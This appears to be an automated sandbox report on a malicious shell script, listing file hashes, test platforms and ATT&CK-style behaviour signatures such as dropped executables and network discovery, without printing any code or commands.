Analysis
-
max time kernel
111s -
max time network
85s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:44
Static task
static1
Behavioral task
behavioral1
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
-
Size
10KB
-
MD5
38c016b5fafe4cb231ee103b3d469c38
-
SHA1
11bf75788a74d2c7bf1a077fb4baedebb0fbf051
-
SHA256
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
-
SHA512
bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a
-
SSDEEP
192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97